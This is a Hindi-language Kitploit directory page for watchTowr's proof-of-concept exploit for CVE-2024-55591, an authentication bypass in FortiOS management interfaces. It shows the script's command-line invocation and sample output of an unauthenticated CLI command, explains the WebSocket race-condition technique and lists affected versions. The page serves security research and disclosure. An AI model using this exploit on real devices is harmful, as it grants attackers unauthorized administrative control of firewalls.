Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
fortios-auth-bypass-poc-CVE-2024-55591 — CVE-2024-55591 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो FortiOS प्रबंधन इंटरफेस में प्रमाणीकरण बायपास को प्रदर्शित करता है, WebSocket रेस कंडीशन के माध्यम से बिना प्रमाणीकरण के CLI कमांड निष्पादित करने के लिए। | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंग
GitHubwatchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

fortios-auth-bypass-poc-CVE-2024-55591

CVE-2024-55591 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो FortiOS प्रबंधन इंटरफेस में प्रमाणीकरण बायपास को प्रदर्शित करता है, WebSocket रेस कंडीशन के माध्यम से बिना प्रमाणीकरण के CLI कमांड निष्पादित करने के लिए।

रिपॉजिटरी देखें
77191 साल पहलेKitploit द्वारा समीक्षित

CVE-2024-55591

Fortinet FortiOS प्रमाणीकरण बायपास प्रूफ ऑफ कॉन्सेप्ट

हमारा ब्लॉग पोस्ट देखें तकनीकी विवरण के लिए

कार्रवाई में पहचान

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

विवरण

यह स्क्रिप्ट CVE-2024-55591 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है, जो FortiOS (Fortigate) प्रबंधन इंटरफेस को लक्षित करती है। WebSocket कनेक्शनों को ब्रूट फोर्स करके एक रेस स्थिति उत्पन्न करके और प्रमाणीकरण बायपास के साथ, FortiOS CLI कमांड को बिना प्रमाणीकरण के भेजना संभव है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।

प्रभावित संस्करण

  • FortiOS 7.0.0 से 7.0.16 तक
  • FortiProxy 7.0.0 से 7.0.19 तक
  • FortiProxy 7.2.0 से 7.2.12 तक

अधिक विवरण Fortinet सलाह पर

नोट

यह स्क्रिप्ट FortiProxy के साथ काम करने के लिए डिज़ाइन नहीं की गई है, क्योंकि प्री-फ़्लाइट जाँच यह निर्धारित करती है कि इंस्टेंस FortiGate प्रबंधन इंटरफ़ेस है या नहीं, लेकिन यह माना जाता है कि अंतर्निहित तकनीक प्रभावित FortiProxy उपकरणों पर लागू है।

watchTowr Labs को फ़ॉलो करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम को फ़ॉलो करें

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें